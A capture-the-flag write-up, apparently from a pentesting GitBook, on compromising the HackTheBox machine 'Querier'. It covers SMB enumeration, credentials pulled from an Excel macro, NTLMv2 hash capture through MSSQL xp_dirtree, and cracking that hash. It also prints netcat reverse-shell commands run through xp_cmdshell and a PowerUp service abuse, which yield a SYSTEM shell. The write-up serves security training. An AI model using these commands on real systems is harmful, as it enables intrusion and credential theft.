Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Nmap
  • SMB
  • Privilege Escalation

Was this helpful?

  1. Writeups
  2. HackTheBox
  3. Windows

Querier

https://www.hackthebox.eu/home/machines/profile/175

Last updated 2 years ago

Was this helpful?

Nmap

We start off by quickly scanning all ports using nmap 10.10.10.125 -p- once this has finished we can take the found ports (ignoring the RCP ports) and scan them more intensively to get the following results:

nmap -p- 10.10.10.125

PORT      STATE SERVICE

135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

nmap 10.10.10.125 -p 135,139,445,1433,5985,47001  -A -T4

PORT      STATE SERVICE       VERSION

135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-10-11T09:14:54
|_Not valid after:  2050-10-11T09:14:54
|_ssl-date: 2020-10-11T09:40:25+00:00; +23s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-11T09:40:21
|_  start_date: N/A

SMB

We start off by checking the SMB ports using smbclient. We are able to connect using the -N switch to specify no password. We can view the remote shares with smbclient -L 10.10.10.125 -N.

After finding the reports share we can attempt to connect directly to it with the following command smbclient \\\\10.10.10.125\\Reports -N

From here we can grab the .xlsm file in the share using the get command.

XLSM is a macro enabled XLSX workbook that use XML and ZIP to store information. We can use binwalk with the -e switch to extract the file to a folder.

We can run the strings command on the vbaProject.bin file to obtain the following information where Uid and Pwd appear to be credentials.

We can also view the macro in LibreOffice Calc to obtain the same information.

We have obtained the following credentials:

  • Username = reporting

  • Password = PcwTWTHRwryjc$c6

We can then use Impacket's mssqlclient.py to connect to the SQL server on port 1433 with the credentials we have found. Before we do so we need to edit our hosts file so we can authenticate to MSSQL.

Add the box domain name to the hosts file in /etc/hosts

After this has been completed we can then navigate to the directory where mssqlclient.py is installed and run the python script using the following syntax:

python mssqlclient.py  querier/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

the $ symbol in the password is not interpreted properly and we will need to encapsulate the password in single quotation marks to send it "as is" for the password to authenticate correctly.

From here the first thing to try would be the command xp_cmdshell to see if we can grab shell. In this instance access was denied so we need to log on elsewhere to proceed. What we can do is to try and capture an NTLM hash by getting the remote machine user account to authenticate against a SMB server on our attacking machine.

When the victim machine sends its request we can capture the NTLM hash and attempt to crack it offline with Hashcat or John the Ripper.

To start this process we need to start a SMB server on our attacking machine. Impacket has a script for this called smbserver.py

python3 smbserver.py -smb2support <sharename> <sharepath>

From here we can run the EXEC xp_dirtree command on the victim machine to attempt to connect back to our attacking machine and we can capture the NTLMv2 hash.

The above command was taken from this Medium article which I highly recommend reading regarding this.

We can see on Kali we have caught the NTLMv2 hash.

We can save the NTLMv2 hash to file and attempt to crack with John The Ripper. If you are having issues with the NTLMv2 hash not loading in John or Hashcat you may be using the latest version of Impacket which was causing me this issue. I reached out for help on TCM's Discord channel and was advised to use Impacket 0.9.19 (I was using 0.9.21).

I was able to easily uninstall Impacket and reinstall with 0.9.21 using Dewalt's pimpmykali python script found here:

After this I was able to grab the NTLMv2 hash again and was able to successfully load it into John.

From here we can run this hash against John with the rockyou.txt word list.

We now have the password "corporate568". We can log into the MSSQL server again as we did above, however this time we can log in with the mssql-svc account which we obtained from the NTLMv2 hash.

mssqlclient.py  querier/mssql-svc:'corporate568'@10.10.10.125 -windows-auth 

Running the help command we get the following output:

What we want is the xp_cmdshell. We first need to enable it with the enable_xp_cmdshell command to make it usable.

After this we can effectively execute cmd commands. We would ideally take advantage of this so we can try to gain a reverse shell to make our usage much easier. I initially tried hosting netcat on the attacking machine with python and could not get a call back using Powershell Invoke-Webrequest or certutil.exe.

Instead I decided on using the smbserver.py script we used earlier. Doing this I can host the nc.exe file in the SMB share and execute it from the MSSQL server.

Move nc.exe to a preferred directory. For ease of use I moved nc.exe into the same directory in which I have smbclient.py located. Once completed run the following command to start up the SMB server again.

sudo python smbserver.py -smb2support <sharename> ./

Once completed start a netcat listener on the attacking machine using nc -lvp 4444.

We can now execute the following command on the MSSQL server:

xp_cmdshell \\<IP>\shared\nc.exe -e cmd.exe <IP> 4444

We now have a reverse shell.

We can now grab the user.txt flag before moving onto Privilege escalation.

Privilege Escalation

I started off by doing basic enumeration and found with whoami /priv that we have the SeImpersonate privilege however, as we are on a Windows 2019 Server machine I was unable to execute the exploit. With anything older than Server 2019 this is usually an easy win.

I uploaded powerup.ps1 to the SMB server and then copied this down into the Reporting directory at C:\Reporting since we have write and execute permissions in this folder.

Powerup also picks up the SeImpersonate token when running the Invoke-AllChecks module. What we are interested in is the service 'UsoSvc' By default running the recommended AbuseFunction as listed below will add a new local administrator account for us.

Instead of this we will use the AbuseFunction to create a netcat reverse shell instead. We can use the following command:

Invoke-ServiceAbuse -Name 'UsoSvc' -command "\10.10.14.19\shared\nc.exe -e cmd.exe 10.10.14.19 6666"

Once again calling the nc.exe in our SMB server we hosted earlier. Just make sure you start a netcat listener on the attacking machine first. If done correctly this should call back a as NT Authority\System

From here we can grab the root.txt flag.

🚩
How to capture MSSQL credentials with xp_dirtree, smbserver.pyMedium
GitHub - Dewalt-arch/pimpmykali: Kali Linux Fixes for Newly Imported VM'sGitHub
Logo
Logo
Using binwalk
Using strings on the .bin file
LibreOffice Calc
running smbserver.py
Captured NTLM hash
Running John against the hash
logging in with the mssql-svc account.
command example
netcat on port 4444
Copying powerup.ps1 from the SMB server.